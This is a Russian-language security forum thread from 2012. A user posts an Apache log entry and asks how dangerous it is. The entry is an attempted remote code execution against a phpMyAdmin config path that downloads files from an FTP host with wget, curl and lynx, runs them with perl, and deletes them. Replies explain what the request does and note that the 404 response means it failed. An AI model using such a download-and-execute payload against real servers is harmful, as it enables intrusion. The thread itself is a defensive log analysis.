HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.05.2012, 00:21
felix_v26
Guest
Сообщений: n/a
Провел на форуме:
4643

Репутация: 0
По умолчанию

сегодня в логах нашёл

"GET /myadmin/config/config.inc.php?eval=system('echo cd /tmp;wget ftp://testing:testing@ip/apache_32.png;mv apache_32.png -O p2.txt;curl -O ftp://testing:testing@ip/apache_32.png;mv apache_32.png; mv apache_32.png p.txt;lynx -DUMP ftp://testing:testing@ip/apache_32.png;mvapache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 227 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"

на скок это опасно?=)
 
Ответить с цитированием

  #2  
Старый 06.05.2012, 01:57
asn007
Guest
Сообщений: n/a
Провел на форуме:
296

Репутация: 0
По умолчанию

А что здесь непонятного? Скачал три подозрительных файла, выполнил их перлом, потер файлы. Лично я ничего хорошего в этом не вижу
 
Ответить с цитированием

  #3  
Старый 06.05.2012, 02:24
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от asn007  
asn007 said:
А что здесь непонятного? Скачал три подозрительных файла, выполнил их перлом, потер файлы. Лично я ничего хорошего в этом не вижу
Скорее попылатлся, так как.

HTTP/1.1" 404

Непонятно, с чего он взял, что в конфиге есть code exec?
 
Ответить с цитированием

  #4  
Старый 06.05.2012, 02:50
spider-intruder
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
Провел на форуме:
3886281

Репутация: 929


Отправить сообщение для spider-intruder с помощью ICQ
По умолчанию

Скорее автосплойт какой то. Или ПенТест тулза. Остальных запрсов невидно толи из-за POST толи нам просто оних не сказали.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ